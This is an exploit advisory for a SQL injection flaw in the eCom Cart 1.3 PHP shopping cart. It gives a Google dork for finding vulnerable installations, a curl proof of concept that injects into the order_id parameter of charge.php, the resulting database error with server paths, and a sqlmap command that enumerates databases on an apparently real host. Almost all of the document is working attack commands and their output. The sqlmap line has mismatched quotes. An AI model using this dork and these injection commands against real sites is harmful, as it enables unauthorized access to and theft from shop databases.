# Exploit Title: eCom Cart 1.3 Exploit# Google Dork: inurl:"/pdetails/11" ([11] is variable)# Date: 10.06.2017# Exploit Author: Alperen Eymen Ozcan & Batuhan Camci# Vendor Homepage: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007# Software Link: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007# Version: 1.3# Tested on: Linux
$ curl http://localhost/ecom-cart/charge.php -d order_id=%271
Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access
violation:1064 You have an error in your SQL syntax; check the manual
that corresponds to your MariaDB server version for the right syntax
to use near '1'' at line 1in/customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php:16
Stack trace:#0 /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php(16):
PDO->query('SELECT * FROM 3...')#1 {main}
thrown in/customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php
on line 16
$ sqlmap -u "http://www.lobisdev.one/ecom-cart/charge.php' --data=order_id=1--dbs
